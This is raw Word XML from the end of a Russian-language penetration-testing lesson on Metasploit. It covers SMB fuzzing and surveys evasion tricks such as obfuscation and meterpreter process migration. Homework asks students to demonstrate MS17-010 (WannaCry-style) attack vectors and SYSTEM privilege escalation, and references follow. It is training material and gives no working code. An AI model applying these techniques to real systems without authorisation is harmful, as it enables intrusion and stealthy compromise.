      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее злоумышленник может попытаться закрепиться в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cu9xx8pe6vio" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 7. Фаззинг параметров а MSF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Фаззинг, согласно Википедии, это техника тестирования программного обеспечения, часто автоматическая или полуавтоматическая, заключающаяся в передаче приложению на вход неправильных, неожиданных или случайных данных. Идея заключается в том, чтобы отследить реакцию приложения на переданные ему данные, определить те данные, которые вызвали некорректное поведение программы и использовать их на практике (например, для написания эксплоита).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Обычно в процессе фазинга запускается средство, которое передает данные программе (т.н. фаззер) а сама исследуемая программа запускается в отладчике или ином средстве, которое позволит отслеживать связку «запрос» - «ответ», которые передаются программе, для отслеживании последствий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В MFS имеется возможность проводить фаззинг параметров для некоторых протоколов. Но модулей для этих целей довольно мало:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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048125" cy="2607267"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25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6072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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим использование фаззинга в MSF на примере модуля smb2_negotiate_corrupt. Этот модуль проверяет поведение SMB сервера путем отправки ему ряд т.н. запросов «SMB negotiate» с некорректными данными. В некоторых случаях это приводит к ошибкам в работе сервера, что может быть использовано злоумышленниками, например, для разработки эксплойтов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">При настройке модуля необходимо задать адрес хоста, и запустить модуль. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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381943" cy="1799561"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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1943" cy="17995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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В случае успешного фаззинга отобразится такое сообщение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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123940" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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116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47">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно видеть, что фаззер показывает те данные, которые вызвали некорректное поведение сервера – что может свидетельствовать о наличии уязвимости (это требуется проверить). В целом, данные модули в MSF сильно проигрывают в функционале специализированным утилитам для фаззинга. Кроме того, в процессе фаззинга требуется наблюдать поведение атакуемой программы в отладчике, чтобы увидеть последствия ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_921piv3ooqui" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы рассмотрели наиболее общие и базовые возможности Metasploit Framework. Обозначим дополнительные:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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При помощи auxiliary-модулей можно проводить сканирование всей сети;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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Можно провести интеграцию сканера уязвимостей OpenVAS и Metasploit; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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Можно осуществлять обфускацию кода, используя meterpreter, чтобы затруднить обнаружение;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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Meterpreter может мигрировать в существующий процесс системы, чтобы сделать атаку незаметной;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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В MSF можно создавать свои модули для эксплоитов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSF можно интегрировать для использования с полезными утилитами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Social Engineering Toolkit (SET)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фреймворк с открытым исходным кодом для тестирования на проникновение, предназначен для социальной инженерии. У SET есть ряд векторов атак по запросу, которые позволяют быстро сделать правдоподобную атаку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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BeeF XSS Framework </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— фреймворк, позволяющий централизованно управлять пулом зараженных через XSS клиентов, отдавать команды и получать результат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSF — фреймворк для тестирования на проникновение, а эта процедура должна производиться только с согласия лиц, ответственных за эксплуатацию исследуемых ресурсов. Используя MSF без предварительного согласия, пентестер рискует получить серьезные последствия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_trgraggfxaow" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое задание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Изучить задание 4. Почему в нем не получилось создать сценарий автозапуска бэкдора с правами SYSTEM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Какие возможности дает злоумышленнику повышение привилегий в Windows до уровня </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ответ обосновать практическими примерами с использованием MSF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Проверить систему на базе ОС Windows на уязвимости, которые могут привести к атакам WannaCRY и подобного вредоносного ПО. Если система уязвима, при помощи MSF продемонстрируйте возможные векторы атак с использованием данной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1fob9te" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные материалы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Как работают различные payload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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Пример утилиты msfencode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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId68">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Возможности meterpreter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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Как добавлять отдельные модули на примере ethernalblue и эксплоита doublepulsar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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId70">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Небольшой cheatsheet по Metasploit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5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId71">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Примеры генерации payload для разных ОС при помощи </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId7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msfvenom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5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId73">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Интеграция Metasploit и OpenVAS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60">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3znysh7" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Используемая литература</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId74">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@svyatoslavlogyn/%D1%87%D1%82%D0%BE-%D1%82%D0%B0%D0%BA%D0%BE%D0%B5-metasploit-%D0%B8-%D1%87%D1%82%D0%BE-%D0%BD%D1%83%D0%B6%D0%BD%D0%BE-%D0%B7%D0%BD%D0%B0%D1%82%D1%8C-%D0%BE-%D0%BD%D0%B5%D0%BC-5a1923b36b88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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/rapid7/metasploit-framework/wiki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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId76">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://metasploit.help.rapid7.com/docs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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.tutorialspoint.com/metasploit/metasploit_basic_commands.htm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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cyber-defense.sans.org/resources/papers/gsec/introduction-metasploit-project-penetration-tester-10715</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId79">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">1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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId80">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://cryptoworld.su/metasploit-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BA%D1%86%D0%B8%D1%8F-%D0%BF%D0%BE-%D0%BF%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8E/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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.carnal0wnage.com/papers/msf_aux_modules.pdf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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hackware.ru/?p=2900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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-3-payloads-0157032/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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pentestlab.blog/2017/04/24/windows-kernel-exploits/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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://support.microsoft.com/ru-ru/help/4023262/how-to-verify-that-ms17-010-is-installed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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://resources.infosecinstitute.com/vulnerability-scanning-metasploit-part-2/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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://kali.tools/?p=1435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6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88" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://cryptoworld.su/beef-framework/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40" w:before="0" w:line="288" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId90" w:type="default"/>
      <w:headerReference r:id="rId91" w:type="first"/>
      <w:footerReference r:id="rId92" w:type="default"/>
      <w:footerReference r:id="rId93" w:type="first"/>
      <w:pgSz w:h="16838" w:w="11906"/>
      <w:pgMar w:bottom="1133" w:top="1133" w:left="1133" w:right="1133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1">
    <w:pPr>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="abb1b9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2">
    <w:pPr>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="abb1b9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© geekbrains.ru</w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
    </w:r>
